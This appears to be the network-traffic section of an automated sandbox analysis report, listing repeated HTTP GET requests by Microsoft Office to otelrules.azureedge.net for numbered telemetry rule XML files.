              Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
